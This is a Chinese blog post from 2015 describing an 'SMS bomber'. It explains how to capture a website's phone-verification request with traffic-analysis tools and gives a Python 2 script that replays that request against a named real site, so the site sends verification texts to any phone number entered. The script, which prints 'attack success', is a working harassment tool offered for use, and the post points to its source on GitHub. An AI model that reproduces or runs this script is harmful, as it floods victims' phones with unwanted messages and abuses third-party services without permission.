python短信轰炸机版本smsbomb----------部分(post)
2015-07-25 15:31
671 查看
用一些用手机号注冊且须要发送验证码的站点的漏洞。能够向不论什么人的手机号发送短信,当然短信内容,我们无法控制。所以主要工作还是寻找这种站点。然后利用Fiddler或者HttpWatch分析请求。使用post还是get,数据格式是怎么样的等。
以http://topic.hongxiu.com/wap/为例:
然后随便填一个电话号码,进行抓包分析:
通过这个能够看出。请求方式是POST,点击webForms就能够看到发送的数据格式。
有了这些就非常easy了,核心就是向serverpost数据
以http://topic.hongxiu.com/wap/为例:
然后随便填一个电话号码,进行抓包分析:
通过这个能够看出。请求方式是POST,点击webForms就能够看到发送的数据格式。
有了这些就非常easy了,核心就是向serverpost数据
import httplib,urllib,sys,os,re,urllib2 import string def attack(phone): datas="" url='http://topic.hongxiu.com/wap/action.aspx' #请求的数据 payload={'hidtpye':'1', 'txtMobile':phone} #注意Referer不能为空 i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5", "Accept": "text/plain",'Referer':'http://topic.hongxiu.com/wap/'} payload=urllib.urlencode(payload) try: request=urllib2.Request(url,payload,i_headers) response=urllib2.urlopen(request) datas=response.read() print datas print 'attack success!!!' except Exception, e: print e print "attack failed!!!" if __name__=="__main__": phone=raw_input('input the phone:') attack(phone)源代码地址:https://github.com/iloster/PythonScripts/blob/master/hongxiu.py
相关文章推荐
- python基础教程总结15——1.即时标记
- python在windows下多版本共存
- python在windows下多版本共存
- Python 实现类似PHP的strip_tags功能,并能够定义他们自己的一套保留标记
- Python计算已经过去多少个周末的方法
- python基础教程总结14——测试
- openCV—Python(3)—— 访问与操作像素
- Python基于动态规划算法计算单词距离
- Python中Django框架利用url来控制登录的方法
- openCV—Python(2)—— 加载、显示和保存图像
- [Python]import 出错
- 使用Eclipse编写Python
- openCV—Python(1)——初始化环境
- python RESTful API框架:Eve 快速入门
- Python实现模拟登录及表单提交的方法
- python函数调用入门
- Python基于有道实现英汉字典功能
- Python实现简单的代理服务器
- python import os
- Python实现截屏的函数